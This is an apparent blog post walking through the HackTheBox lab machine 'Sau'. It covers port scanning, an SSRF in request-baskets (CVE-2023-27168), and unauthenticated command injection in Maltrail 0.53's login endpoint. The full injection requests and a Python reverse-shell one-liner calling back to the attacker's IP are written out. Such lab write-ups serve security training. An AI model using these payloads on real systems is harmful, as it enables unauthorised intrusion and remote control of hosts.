<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Solving the Sau Mystery - A Thrilling HTB Machine Walkthrough | Nehal Zaman</title>
<meta name="generator" content="Jekyll v4.3.1" />
<meta property="og:title" content="Solving the Sau Mystery - A Thrilling HTB Machine Walkthrough" />
<meta name="author" content="Nehal Zaman" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A perpetual learner. CTF player. Programmer." />
<meta property="og:description" content="A perpetual learner. CTF player. Programmer." />
<link rel="canonical" href="http://localhost:4000/posts/sau_htb.html" />
<meta property="og:url" content="http://localhost:4000/posts/sau_htb.html" />
<meta property="og:site_name" content="Nehal Zaman" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-08-02T00:00:00-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Solving the Sau Mystery - A Thrilling HTB Machine Walkthrough" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Nehal Zaman"},"dateModified":"2023-08-02T00:00:00-04:00","datePublished":"2023-08-02T00:00:00-04:00","description":"A perpetual learner. CTF player. Programmer.","headline":"Solving the Sau Mystery - A Thrilling HTB Machine Walkthrough","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/sau_htb.html"},"url":"http://localhost:4000/posts/sau_htb.html"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>Nehal Zaman</h1>
        </a>
        <h2>A perpetual learner. CTF player. Programmer.</h2>

        <section id="downloads">
          
        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>2 August 2023</small>
<h1>Solving the Sau Mystery - A Thrilling HTB Machine Walkthrough</h1>

<p class="view">by Nehal Zaman</p>

<p><img src="/assets/images/writeups/sau/banner.png" alt="" /></p>

<h1 id="introduction">INTRODUCTION</h1>

<p>Hello everyone! Today, we will be exploring <a href="https://app.hackthebox.com/machines/Sau">Sau</a>, an easy Linux box created by <a href="https://app.hackthebox.com/users/201596">sau123</a> on <a href="https://app.hackthebox.com/home">HackTheBox</a>.</p>

<p>Our approach for gaining access to this box involves identifying and exploiting a CVE in a running service to gain an initial foothold. From there, we’ll uncover another vulnerability that allows us to access the box as a low-privileged user.</p>

<p>The final step of our hack involves leveraging the sudo rights granted to the local user to escalate privileges.</p>

<p>Now that the stage is set, let’s dive right in!</p>

<h1 id="scannning">SCANNNING</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/sau]
└─<span class="nv">$ </span>rustscan <span class="nt">-a</span> 10.10.11.224 <span class="nt">-r</span> 1-65535 <span class="nt">-u</span> 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| <span class="o">{}</span>  <span class="o">}</span>| <span class="o">{</span> <span class="o">}</span> |<span class="o">{</span> <span class="o">{</span>__ <span class="o">{</span>_   _<span class="o">}{</span> <span class="o">{</span>__  /  ___<span class="o">}</span> / <span class="o">{}</span> <span class="se">\ </span>|  <span class="sb">`</span>| |
| .-. <span class="se">\|</span> <span class="o">{</span>_<span class="o">}</span> |.-._<span class="o">}</span> <span class="o">}</span> | |  .-._<span class="o">}</span> <span class="o">}</span><span class="se">\ </span>    <span class="o">}</span>/  /<span class="se">\ </span> <span class="se">\|</span> |<span class="se">\ </span> |
<span class="sb">`</span>-<span class="s1">' `-'</span><span class="sb">`</span><span class="nt">-----</span><span class="s1">'`----'</span>  <span class="sb">`</span>-<span class="s1">'  `----'</span>  <span class="sb">`</span><span class="nt">---</span><span class="s1">' `-'</span>  <span class="sb">`</span>-<span class="s1">'`-'</span> <span class="sb">`</span>-<span class="s1">'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.224:22
Open 10.10.11.224:55555
[~] Starting Script(s)
[&gt;] Script to be run Some("nmap -vvv -p  ")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-01 13:11 EDT
Initiating Ping Scan at 13:11
Scanning 10.10.11.224 [2 ports]
Completed Ping Scan at 13:11, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:11
Completed Parallel DNS resolution of 1 host. at 13:11, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:11
Scanning 10.10.11.224 [2 ports]
Discovered open port 22/tcp on 10.10.11.224
Discovered open port 55555/tcp on 10.10.11.224
Completed Connect Scan at 13:11, 0.15s elapsed (2 total ports)
Nmap scan report for 10.10.11.224
Host is up, received conn-refused (0.16s latency).
Scanned at 2023-08-01 13:11:55 EDT for 0s

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack
55555/tcp open  unknown syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
</span></code></pre></div></div>

<p>From the <code class="language-plaintext highlighter-rouge">rustscan</code> result, we can see ports 22 and 55555 are open.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/sau]
└─<span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p22</span>,55555 10.10.11.224
Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2023-08-01 13:13 EDT
Nmap scan report <span class="k">for </span>10.10.11.224
Host is up <span class="o">(</span>0.15s latency<span class="o">)</span><span class="nb">.</span>

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 aa8867d7133d083a8ace9dc4ddf3e1ed <span class="o">(</span>RSA<span class="o">)</span>
|   256 ec2eb105872a0c7db149876495dc8a21 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 b30c47fba2f212ccce0b58820e504336 <span class="o">(</span>ED25519<span class="o">)</span>
55555/tcp open  unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
|     X-Content-Type-Options: nosniff
|     Date: Tue, 01 Aug 2023 17:13:39 GMT
|     Content-Length: 75
|     invalid basket name<span class="p">;</span> the name does not match pattern: ^[wd-_<span class="se">\.</span><span class="o">]{</span>1,250<span class="o">}</span><span class="err">$</span>
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
|     Location: /web
|     Date: Tue, 01 Aug 2023 17:13:10 GMT
|     Content-Length: 27
|     <span class="nv">href</span><span class="o">=</span><span class="s2">"/web"</span><span class="o">&gt;</span>Found&lt;/a&gt;.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Tue, 01 Aug 2023 17:13:11 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V<span class="o">=</span>7.93%I<span class="o">=</span>7%D<span class="o">=</span>8/1%Time<span class="o">=</span>64C93D26%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>Ge
SF:tRequest,A2,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">0</span><span class="se">\x</span><span class="s2">20302</span><span class="se">\x</span><span class="s2">20Found</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">
SF:20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Location:</span><span class="se">\x</span><span class="s2">20/web</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Tue,</span><span class="se">\x</span><span class="s2">2001</span><span class="se">\x</span><span class="s2">20Aug</span><span class="se">\x</span><span class="s2">202
SF:023</span><span class="se">\x</span><span class="s2">2017:13:10</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2027</span><span class="se">\r\n\r\n</span><span class="s2">&lt;a</span><span class="se">\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">/we
SF:b</span><span class="se">\"</span><span class="s2">&gt;Found&lt;/a&gt;</span><span class="se">\.\n\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>GenericLines,67,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Req
SF:uest</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/plain;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">2
SF:0close</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span>%r<span class="o">(</span>HTTPOptions,60,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">0</span><span class="se">\x</span><span class="s2">2020
SF:0</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">Allow:</span><span class="se">\x</span><span class="s2">20GET,</span><span class="se">\x</span><span class="s2">20OPTIONS</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Tue,</span><span class="se">\x</span><span class="s2">2001</span><span class="se">\x</span><span class="s2">20Aug</span><span class="se">\x</span><span class="s2">202
SF:023</span><span class="se">\x</span><span class="s2">2017:13:11</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">200</span><span class="se">\r\n\r\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>RTSPRequest,
SF:67,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/plain;</span><span class="se">\</span><span class="s2">
SF:x20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span>
SF:%r<span class="o">(</span>Help,67,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text
SF:/plain;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20R
SF:equest"</span><span class="o">)</span>%r<span class="o">(</span>SSLSessionReq,67,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Cont
SF:ent-Type:</span><span class="se">\x</span><span class="s2">20text/plain;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r</span><span class="s2">
SF:</span><span class="se">\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span>%r<span class="o">(</span>TerminalServerCookie,67,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">
SF:20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/plain;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Co
SF:nnection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span>%r<span class="o">(</span>TLSSessionReq,67,<span class="s2">"H
SF:TTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/plain;</span><span class="se">\x</span><span class="s2">20ch
SF:arset=utf-8</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span>%r<span class="o">(</span>Ke
SF:rberos,67,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/
SF:plain;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Re
SF:quest"</span><span class="o">)</span>%r<span class="o">(</span>FourOhFourRequest,EA,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">0</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">C
SF:ontent-Type:</span><span class="se">\x</span><span class="s2">20text/plain;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">X-Content-Type-Options:
SF:</span><span class="se">\x</span><span class="s2">20nosniff</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Tue,</span><span class="se">\x</span><span class="s2">2001</span><span class="se">\x</span><span class="s2">20Aug</span><span class="se">\x</span><span class="s2">202023</span><span class="se">\x</span><span class="s2">2017:13:39</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\</span><span class="s2">
SF:nContent-Length:</span><span class="se">\x</span><span class="s2">2075</span><span class="se">\r\n\r\n</span><span class="s2">invalid</span><span class="se">\x</span><span class="s2">20basket</span><span class="se">\x</span><span class="s2">20name;</span><span class="se">\x</span><span class="s2">20the</span><span class="se">\x</span><span class="s2">20name
SF:</span><span class="se">\x</span><span class="s2">20does</span><span class="se">\x</span><span class="s2">20not</span><span class="se">\x</span><span class="s2">20match</span><span class="se">\x</span><span class="s2">20pattern:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\^\[\\</span><span class="s2">w</span><span class="se">\\</span><span class="s2">d</span><span class="se">\\</span><span class="s2">-_</span><span class="se">\\\.\]</span><span class="s2">{1,250}</span><span class="se">\$\n</span><span class="s2">
SF:"</span><span class="o">)</span>%r<span class="o">(</span>LPDString,67,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\</span><span class="s2">
SF:x20text/plain;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20B
SF:ad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span>%r<span class="o">(</span>LDAPSearchReq,67,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\</span><span class="s2">
SF:r</span><span class="se">\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/plain;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20clos
SF:e</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span><span class="p">;</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>100.50 seconds
</code></pre></div></div>

<p><strong>SSH</strong> is running on port <strong>22</strong>, and seemingly some <strong>HTTP</strong> service is running on port <strong>55555</strong></p>

<h1 id="exploring-the-website">EXPLORING THE WEBSITE</h1>

<p><img src="/assets/images/writeups/sau/1.png" alt="" /></p>

<p>From the picture, we can see an application called <code class="language-plaintext highlighter-rouge">request-baskets</code> is running on the port 55555. The github source link can also be found at the bottom of the page.</p>

<p><strong>Request Baskets</strong> is a web service to collect arbitrary HTTP requests and inspect them via RESTful API or simple web UI.</p>

<p><img src="/assets/images/writeups/sau/2.png" alt="" /></p>

<p>We have created a basket called <code class="language-plaintext highlighter-rouge">cur1osity</code>. A token is also provided for accessing the basket.</p>

<p><img src="/assets/images/writeups/sau/3.png" alt="" /></p>

<p>Our created basket seems empty at this point. Let us make a request to the given basket.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/sau]
└─<span class="nv">$ </span>curl http://10.10.11.224:55555/cur1osity 
</code></pre></div></div>

<p><img src="/assets/images/writeups/sau/4.png" alt="" /></p>

<p>Now, we can see the request we have sent.</p>

<p>But we do not see any response here.</p>

<p><img src="/assets/images/writeups/sau/5.png" alt="" /></p>

<p>If we click on the <code class="language-plaintext highlighter-rouge">settings</code> icon in the top right, we see that we can set up a forward URL to which our requests will be redirected.</p>

<p>To explore the redirection feature of Request Baskets, we will create a simple dummy page and configure the application’s settings to forward requests to our dummy page.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/sau]
└─<span class="nv">$ </span><span class="nb">echo</span> <span class="s1">'&lt;h1&gt;PoC By Curiosity (Nehal Zaman)&lt;/h1&gt;'</span> <span class="o">&gt;</span> index.html
                                                                                                                                                                                             
┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/sau]
└─<span class="nv">$ </span>python <span class="nt">-m</span> http.server 80
Serving HTTP on 0.0.0.0 port 80 <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ...
</code></pre></div></div>
<p><img src="/assets/images/writeups/sau/6.png" alt="" /></p>

<p>We have reconfigured our settings.</p>

<p><img src="/assets/images/writeups/sau/7.png" alt="" /></p>

<p>We can see that after requesting the basket URL, we are getting the contents that we created in our server.</p>

<p>At the very basic, the <code class="language-plaintext highlighter-rouge">request-baskets</code> is acting like a proxy here.</p>

<h2 id="cve-2023-27168-in-request-baskets">CVE-2023-27168 in <code class="language-plaintext highlighter-rouge">request-baskets</code></h2>

<p>The requesting feature of <code class="language-plaintext highlighter-rouge">request-baskets</code> is found to be potentially vulnerable to <strong>Server-Side Request Forgery (SSRF)</strong> due to inadequate validation of the Forward URL.</p>

<p>An SSRF vulnerability allows malicious users to manipulate the application to send crafted requests to internal services that should not be directly accessible from external networks. By providing the <code class="language-plaintext highlighter-rouge">localhost</code> IP address or other internal IP addresses and common port numbers, an attacker can potentially access sensitive internal services.</p>

<p>So, we set the Forward URL to <code class="language-plaintext highlighter-rouge">localhost</code> IP and tested common port numbers such as <code class="language-plaintext highlighter-rouge">80</code>, <code class="language-plaintext highlighter-rouge">8080</code>, <code class="language-plaintext highlighter-rouge">5000</code>, <code class="language-plaintext highlighter-rouge">3000</code>, etc. As a result, we were able to access another website running internally on port 80, which was hosting an application called <code class="language-plaintext highlighter-rouge">Maltrail</code>.</p>

<p>This confirmed the presence of the <code class="language-plaintext highlighter-rouge">CVE-2023-27168</code> vulnerability, exposing the risk of SSRF exploitation in <code class="language-plaintext highlighter-rouge">request-baskets</code>.</p>

<p><img src="/assets/images/writeups/sau/8.png" alt="" /></p>

<p><img src="/assets/images/writeups/sau/9.png" alt="" /></p>

<h1 id="exploiting-internal-web-application">EXPLOITING INTERNAL WEB APPLICATION</h1>

<p>From the web source HTML, we can see that the version of <code class="language-plaintext highlighter-rouge">Maltrail</code> application is <code class="language-plaintext highlighter-rouge">0.53</code>.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
SNIP
.
<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"bottom_blank"</span><span class="nt">&gt;&lt;/div&gt;</span>
<span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"bottom noselect"</span><span class="nt">&gt;</span>Powered by <span class="nt">&lt;b&gt;</span>M<span class="nt">&lt;/b&gt;</span>altrail (v<span class="nt">&lt;b&gt;</span>0.53<span class="nt">&lt;/b&gt;</span>)<span class="nt">&lt;/div&gt;</span>
.
SNIP
.
</code></pre></div></div>

<p>A quick google reveals that this version of <code class="language-plaintext highlighter-rouge">Maltrail</code> is vulnerable to an unauthenticated blind OS command injection vulnerability.</p>

<p>During the <code class="language-plaintext highlighter-rouge">login</code> process, the application is not adequately checking the <code class="language-plaintext highlighter-rouge">username</code> parameter in <code class="language-plaintext highlighter-rouge">/login</code> endpoint, which is then passed to <code class="language-plaintext highlighter-rouge">subprocess.check_output</code> function. So we can use characters like <code class="language-plaintext highlighter-rouge">;</code> to chain aritrary OS level commands. Read more about it <a href="https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/">here</a></p>

<p>To confirm this vulnerability, we crafted a payload and sent a POST request to the <code class="language-plaintext highlighter-rouge">/cur1osity/login</code> endpoint:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /cur1osity/login HTTP/1.1
Host: 10.10.11.224:55555
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://10.10.11.224:55555
DNT: 1
Connection: close
Referer: http://10.10.11.224:55555/cur1osity

username=test%3b`ping+-c4+10.10.14.234`&amp;hash=1776e602e34d27447a954641218d3df4d2965011690964a4b0b44bfbb0c57554&amp;nonce=J8iJBxndSHMV
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/sau]
└─<span class="nv">$ </span><span class="nb">sudo </span>tcpdump <span class="nt">-i</span> tun0 icmp
tcpdump: verbose output suppressed, use <span class="nt">-v</span><span class="o">[</span>v]... <span class="k">for </span>full protocol decode
listening on tun0, link-type RAW <span class="o">(</span>Raw IP<span class="o">)</span>, snapshot length 262144 bytes
14:26:13.523002 IP 10.10.11.224 <span class="o">&gt;</span> 10.10.14.234: ICMP <span class="nb">echo </span>request, <span class="nb">id </span>3, <span class="nb">seq </span>1, length 64
14:26:13.523013 IP 10.10.14.234 <span class="o">&gt;</span> 10.10.11.224: ICMP <span class="nb">echo </span>reply, <span class="nb">id </span>3, <span class="nb">seq </span>1, length 64
14:26:14.524081 IP 10.10.11.224 <span class="o">&gt;</span> 10.10.14.234: ICMP <span class="nb">echo </span>request, <span class="nb">id </span>3, <span class="nb">seq </span>2, length 64
14:26:14.524093 IP 10.10.14.234 <span class="o">&gt;</span> 10.10.11.224: ICMP <span class="nb">echo </span>reply, <span class="nb">id </span>3, <span class="nb">seq </span>2, length 64
14:26:15.525579 IP 10.10.11.224 <span class="o">&gt;</span> 10.10.14.234: ICMP <span class="nb">echo </span>request, <span class="nb">id </span>3, <span class="nb">seq </span>3, length 64
14:26:15.525590 IP 10.10.14.234 <span class="o">&gt;</span> 10.10.11.224: ICMP <span class="nb">echo </span>reply, <span class="nb">id </span>3, <span class="nb">seq </span>3, length 64
14:26:16.527744 IP 10.10.11.224 <span class="o">&gt;</span> 10.10.14.234: ICMP <span class="nb">echo </span>request, <span class="nb">id </span>3, <span class="nb">seq </span>4, length 64
14:26:16.527756 IP 10.10.14.234 <span class="o">&gt;</span> 10.10.11.224: ICMP <span class="nb">echo </span>reply, <span class="nb">id </span>3, <span class="nb">seq </span>4, length 64
</code></pre></div></div>

<p>As a result, we successfully triggered the command injection and received ping replies from our machine, confirming the presence of the vulnerability and the risk of blind OS command injection in <code class="language-plaintext highlighter-rouge">Maltrail</code>.</p>

<h1 id="shell-as-puma">SHELL AS PUMA</h1>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /cur1osity/login HTTP/1.1
Host: 10.10.11.224:55555
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://10.10.11.224:55555
DNT: 1
Connection: close
Referer: http://10.10.11.224:55555/cur1osity

username=test%3b`python3+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.234",443))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport+pty%3b+pty.spawn("sh")'`&amp;hash=1776e602e34d27447a954641218d3df4d2965011690964a4b0b44bfbb0c57554&amp;nonce=J8iJBxndSHMV
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/sau]
└─<span class="nv">$ </span>nc <span class="nt">-nlvp</span> 443
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>10.10.14.234] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.224] 58444
<span class="nv">$ </span><span class="nb">id</span><span class="p">;</span> <span class="nb">hostname
</span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>puma<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>puma<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>puma<span class="o">)</span>
sau
</code></pre></div></div>

<p>Payload used:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.234",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
</code></pre></div></div>

<p>We have received reverse shell as user <code class="language-plaintext highlighter-rouge">puma</code>.</p>

<h1 id="privilege-escalation-to-root">PRIVILEGE ESCALATION TO ROOT</h1>

